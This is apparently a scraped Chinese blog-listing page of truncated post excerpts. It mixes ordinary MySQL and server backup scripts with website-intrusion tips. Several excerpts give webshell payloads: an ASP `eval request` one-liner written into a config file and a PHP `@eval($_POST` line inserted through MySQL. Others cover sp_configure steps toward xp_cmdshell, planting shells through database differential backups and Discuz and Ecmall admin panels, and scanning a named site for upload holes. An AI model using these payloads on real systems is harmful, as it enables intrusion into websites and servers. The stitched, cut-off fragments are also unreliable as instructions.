今天在 中国被黑站点统计系统 上看到别人拿的一个站,就顺便练习了一下,让大家见笑了,高手飘过,请大家多多指教,谢谢,具体请看附件。
原创
2011-04-02 14:08:07
471阅读
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章作者:fhod
帝国备份王(Empirebak)简介
EmpireBak是一款完全免费、专门为Mysql大数据的备份与导入而设计的软件,系统采用分卷备份与导入,理论上可备份任何大小的数据库.
可在 http://www.phome.net/ebak2008os/ 下载到
默认账号密码为
admin 
转载
精选
2011-01-24 19:49:59
1742阅读
这个脚本虽然比较简单,但觉得会帮我们很大的忙! 简单说一下: DB_USER=”user” 为用户名 DB_PASS=”password” 为密码mkdir /home/mysqlbak/$DATE 指定并创建要备份到的目录 BIN_DIR=”/usr/local/mysql/bin” 指定你的MYSQL的位置 BCK_DIR=”/home/mysqlbak/$DATE” 将你的数据库备份到以日期
转载
2024-03-01 15:19:54
26阅读
说明:1、指定备份目录2、在目录下查看是否有当日的文件夹,没有则生成3、执行脚本备份制定目录,排除upload附件目录,按日期时分秒生成备份。#/bin/shbackup_dir=/home/erdpc/backuparchive=`date +%Y%m%d`backup_file=`date +%Y-%m-%d-%H-%M-%S`if [ ! -d $backup_dir/$archive ];
原创
2022-08-18 09:36:59
64阅读
sqlserver差异备份渗透
原创
2018-01-24 22:22:04
10000+阅读
点赞
飞鸟游鱼原创
1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
2.写入配置文件一句话木马,如果过滤了,(,)可尝试<%eval
request("value")%>来突破,例如
config.asp
转载
精选
2009-09-24 02:19:02
2174阅读
点赞
飞鸟游鱼原创
1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
2.写入配置文件一句话木马,如果过滤了,(,)可尝试<%eval
request("value")%>来突破,例如
config.asp
转载
2010-08-10 22:36:04
537阅读
 
文章没什么意思,唯一亮点就在于dz后台拿shell,不过也全文贴过来吧,图片不全贴了麻烦,就贴2张。Blog:http://hi.baidu.com/zhenker这几天心情很烦躁,于是想找个黑客网站检测下,百度搜到了饭客网,论坛是DZ的,手中没0day,杯具,习惯性的用我自己的明小子扫下,看能扫到啥能利用的,扫了半天扫到了一个很有利用价值的文件如下图:上次跟小凯搞一个黑客站的时候
转载
精选
2010-11-16 16:36:35
855阅读
1.MGR特点MySQL Group Replication(MGR)是MySQL官方在5.7.17版本引进的一个数据库高可用与高扩展的解决方案,以插件形式提供,实现了分布式下数据的最终一致性,总结MGR特点如下:高一致性:基于分布式paxos协议实现组复制,保证数据一致性;高容错性:自动检测机制,只要不是大多数节点都宕机就可以继续工作,内置防脑裂保护机制;高扩展性:节点的增加与移除会自动更新组成
应用场景:备份公司web服务器数据,日志以及系统配置信息。脚本说明:本地使用tar备份,备份完成时使用md5sum 生成标志以便备份服务器上检查备份是否成功,备份结果用rsync推送到备份服务器(也可使用ftp方式上传至ftp服务器),备份服务器检查备份是否成功并发送邮件通知管理员。备份本地保留一周,服务器保留一月数据。分析:需要备份内容(1-4为配置文件,5-6为web服务器数据及日志)1、定时
原创
2017-11-21 10:54:20
1850阅读
昨晚在拿站过程中遇到了个ASP+MSSQL2005的注入点,权限是DB_Owner的权限,网站路径也搞到了,本想使用差异备份,在数据库日志中插入一句话,然后备份到网站目录下拿shell的,估计是用户没有备份数据库的权限,但使用MSSQL2000的备份方法根本行不通,后来才想到MSSQL2005的备份和MSSQL2000有点不同。 后来在网
转载
精选
2011-07-15 14:08:49
832阅读
昨晚在拿站过程中遇到了个ASP+MSSQL2005的注入点,权限是DB_Owner的权限,网站路径也搞到了,本想使用差异备份,在数据库日志中插入一句话,然后备份到网站目录下拿shell的,估计是用户没有备份数据库的权限,但使用MSSQL2000的备份方法根本行不通,后来才想到MSSQL2005的备份和MSSQL2000有点不同。 后来在网
转载
2017-07-13 20:57:55
2580阅读
MongoDB shell MongoDB自带简洁但功能强大的JavaScript shell。JavaScript shell键入一个变量会将变量的值转换为字符串打印到控制台上。 下面介绍基本的操作,一些注意事项。数据库CRUD操作将在下面的篇幅中介绍《NoSQL学习之路 (四):创建、读取、更新、删除(CRUD)》 打开命令提示(cmd.exe)。进入到MongoDB解压的目录的
转载
2023-10-13 14:39:53
87阅读
进后台直奔扩展->挂件管理,下面的每一个挂件都对应着Php文件~拿第一个最新成交挂件举例,直接点击编辑脚本,写你的一句话,然后连接external\widgets\latest_sold\main.widget.php~OK~结束
~另外说下Ecmall现在公布的那个2.2延迟注射其实不用那么麻烦~直接爆错注入就可以了~虽然Ecmall发生错误时会自动跳转到上一页~但是那点儿时
原创
2011-05-21 12:03:30
1659阅读
方法一:CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POS
翻译
精选
2013-06-21 11:09:57
1503阅读
execute('sp_configure "show advanced options",1') #将该选项的值设置为1
execute('reconfigure') #保存设置
execu
原创
2024-10-17 10:03:46
148阅读
# SQL Server 拿Shell:初学者指南
作为一名经验丰富的开发者,我深知刚入行的小白在面对“SQL Server 拿Shell”这一任务时可能会感到困惑。本文将详细介绍如何实现这一任务,帮助初学者快速掌握相关技能。
## 一、流程概览
首先,我们通过一个表格来展示整个流程的步骤:
| 步骤 | 描述 |
| --- | --- |
| 1 | 安装SQL Server |
|
原创
2024-07-21 09:50:55
67阅读
需要工具:1,挖掘鸡 2,明小子旁注入工具,3,ASP站长助手。第一步:使用挖掘鸡工具扫描漏洞网站,关键词填:"动力" 添加后缀名:upfile_soft.asp点“开始” 接着点“检测结果” 稍等一会就有很多漏洞网站出来了,由于省时间,我这里已经找到了一个了。http://www.dnjk.com/upfile_soft.asp 是“东南健康网”第二步:打开明小子旁注
转载
精选
2006-03-23 01:06:14
3225阅读
2评论
#/bin/bash
BackuPath=/opt/backup/
WebPath=/usr/local/apache2/htdocs/
DATE=`date +%Y%m%d`
WebBakFIle=web${DATE}.tar.bz2
DBFile=DB${DATE}.tar.bz2
DBuser='root'
DBpassword='123'
ftp_user="bbq"
ftp_p
原创
2014-10-28 22:51:54
713阅读
#!/bin/bash
#制定运行的脚本shell
#运行脚本要给用户执行权限
backdir=/backup'
month='date +%m'
day='date+%d'
year=‘date+%y'
hour='date+%k'
min='date+%m'
dirname=$year-$month-$day-$hour-$min
mkdir $ba
原创
2013-02-20 19:39:25
377阅读
